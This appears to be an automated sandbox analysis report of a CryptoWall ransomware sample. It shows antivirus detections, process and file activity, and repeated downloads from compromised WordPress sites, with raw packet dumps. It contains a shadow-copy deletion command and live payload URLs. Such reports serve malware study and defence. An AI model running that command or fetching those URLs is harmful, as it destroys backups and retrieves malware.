Analysis Date: 2014-11-09 00:35:54
MD5: 23a6a98a446c0981e4021867b235bd25
SHA1: c4f861191578ca4c4f8f0f53ea6a79c25be6b67a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
AV | 360 Safe | Trojan.GenericKD.1961069
AV | Ad-Aware | Trojan.GenericKD.1961069
AV | Alwil (avast) | Trojan-gen:Win32:Trojan-gen
AV | Arcabit (arcavir) | no_virus
AV | Authentium | W32/Trojan.LKCO-1204
AV | Avira (antivir) | TR/Andromeda.31018227
AV | BullGuard | Trojan.GenericKD.1961069
AV | CA (E-Trust Ino) | Win32/Inject.NSaefVC
AV | CAT (quickheal) | no_virus
AV | ClamAV | no_virus
AV | Dr. Web | no_virus
AV | Emsisoft | Trojan.Win32.FileCoder
AV | Eset (nod32) | Win32/Filecoder.CO
AV | Fortinet | no_virus
AV | Frisk (f-prot) | W32/Trojan3.LYL
AV | F-Secure | no_virus
AV | Grisoft (avg) | Inject2.BDKL
AV | Ikarus | Trojan-Ransom.CryptoWall
AV | K7 | no_virus
AV | Kaspersky | Trojan-Dropper.Win32.Injector.kvgh
AV | MalwareBytes | Trojan.CryptoWall
AV | Mcafee | no_virus
AV | Microsoft Security Essentials | Ransom:Win32/Crowti.A
AV | MicroWorld (escan) | no_virus
AV | Norman | Trojan.GenericKD.1961069
AV | Rising | no_virus
AV | Sophos | Troj/Ransom-ANL
AV | Symantec | no_virus
AV | Trend Micro | no_virus
AV | VirusBlokAda (vba32) | no_virus

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\a1a0cab\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.grekiskaforeningen.com
Winsock DNS: bethpeters.net
Winsock DNS: designbytheme.com
Winsock DNS: blog.marianisel.com
Winsock DNS: freekidsvideos.net
Winsock DNS: virachey.com
Winsock DNS: danielferris.com.au
Winsock DNS: clerktogovernors.co.uk
Winsock DNS: bball-keyman.net
Winsock DNS: stpaulmaybee.org

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: bethpeters.net
Type: A
184.154.193.178
DNS: danielferris.com.au
Type: A
117.55.227.125
DNS: stpaulmaybee.org
Type: A
198.23.48.88
DNS: bball-keyman.net
Type: A
203.189.105.172
DNS: virachey.com
Type: A
198.23.48.160
DNS: clerktogovernors.co.uk
Type: A
94.136.40.103
DNS: freekidsvideos.net
Type: A
192.252.214.226
DNS: blog.marianisel.com
Type: A
70.167.156.65
DNS: designbytheme.com
Type: A
174.136.39.160
DNS: www.grekiskaforeningen.com
Type: A
193.12.177.238
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 184.154.193.178:80
Flows TCP: 192.168.1.1:1032 ➝ 117.55.227.125:80
Flows TCP: 192.168.1.1:1033 ➝ 198.23.48.88:80
Flows TCP: 192.168.1.1:1034 ➝ 203.189.105.172:80
Flows TCP: 192.168.1.1:1035 ➝ 198.23.48.160:80
Flows TCP: 192.168.1.1:1036 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1037 ➝ 192.252.214.226:80
Flows TCP: 192.168.1.1:1038 ➝ 70.167.156.65:80
Flows TCP: 192.168.1.1:1039 ➝ 174.136.39.160:80
Flows TCP: 192.168.1.1:1040 ➝ 193.12.177.238:80
Flows TCP: 192.168.1.1:1041 ➝ 184.154.193.178:80
Flows TCP: 192.168.1.1:1042 ➝ 117.55.227.125:80
Flows TCP: 192.168.1.1:1043 ➝ 198.23.48.88:80
Flows TCP: 192.168.1.1:1044 ➝ 203.189.105.172:80
Flows TCP: 192.168.1.1:1045 ➝ 198.23.48.160:80
Flows TCP: 192.168.1.1:1046 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1047 ➝ 192.252.214.226:80
Flows TCP: 192.168.1.1:1048 ➝ 70.167.156.65:80
Flows TCP: 192.168.1.1:1049 ➝ 174.136.39.160:80
Flows TCP: 192.168.1.1:1050 ➝ 193.12.177.238:80
Flows TCP: 192.168.1.1:1051 ➝ 184.154.193.178:80
Flows TCP: 192.168.1.1:1052 ➝ 117.55.227.125:80
Flows TCP: 192.168.1.1:1053 ➝ 198.23.48.88:80
Flows TCP: 192.168.1.1:1054 ➝ 203.189.105.172:80
Flows TCP: 192.168.1.1:1055 ➝ 198.23.48.160:80
Flows TCP: 192.168.1.1:1056 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1057 ➝ 192.252.214.226:80
Flows TCP: 192.168.1.1:1058 ➝ 70.167.156.65:80
Flows TCP: 192.168.1.1:1059 ➝ 174.136.39.160:80
Flows TCP: 192.168.1.1:1060 ➝ 193.12.177.238:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a61 6368650d 0a0d0a0d 0a         ...ache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
